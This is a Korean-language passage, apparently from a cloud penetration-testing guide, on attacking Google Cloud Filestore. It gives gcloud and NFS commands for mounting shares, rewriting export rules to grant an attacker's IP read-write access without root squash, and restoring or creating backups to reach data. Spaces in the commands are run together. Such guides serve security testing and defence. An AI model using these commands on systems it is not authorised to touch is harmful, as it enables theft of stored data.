공유 파일 시스템은 공격자 관점에서 흥미로운 민감한 정보를 포함할 수 있습니다. Filestore에 액세스하면 마운트할 수 있습니다:
sudoapt-getupdatesudoapt-getinstallnfs-common# Check the share nameshowmount-e<IP># Mount the sharemkdir/mnt/fssudomount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
공격자가 공유에 대한 액세스 권한이 있는 IP 주소에 있지 않지만 수정할 충분한 권한이 있다면 제한 사항을 제거하거나 액세스 권한을 얻을 수 있습니다. 또한 IP 주소에 대해 더 많은 권한을 부여하여 공유에 대한 관리자 액세스를 얻을 수도 있습니다:
gcloudfilestoreinstancesupdatenfstest \--zone=<exact-zone> \--flags-file=nfs.json# Contents of nfs.json{"--file-share":{"capacity":"1024","name":"<share-name>","nfs-export-options": [{"access-mode":"READ_WRITE","ip-ranges": ["<your-ip-private-address>/32"],"squash-mode":"NO_ROOT_SQUASH","anon_uid":1003,"anon_gid":1003}]}}
백업 복원
백업이 있는 경우 기존 또는 새로운 인스턴스에 복원하여 정보에 액세스할 수 있습니다:
# Create a new filestore if you don't want to modify the old onegcloudfilestoreinstancescreate<new-instance-name> \--zone=<zone> \--tier=STANDARD \--file-share=name=vol1,capacity=1TB \--network=name=default,reserved-ip-range=10.0.0.0/29# Restore a backups in a new instancegcloudfilestoreinstancesrestore<new-instance-name> \--zone=<zone> \--file-share=<instance-file-share-name> \--source-backup=<backup-name> \--source-backup-region=<backup-region># Follow the previous section commands to mount it
백업 만들기 및 복원하기
만약 공유에 액세스할 수 없고 수정하고 싶지 않다면, 이를 백업하고 이전에 언급한 대로 복원할 수 있습니다:
# Create share backupgcloudfilestorebackupscreate<back-name> \--region=<region> \--instance=<instance-name> \--instance-zone=<instance-zone> \--file-share=<share-name># Follow the previous section commands to restore it and mount it
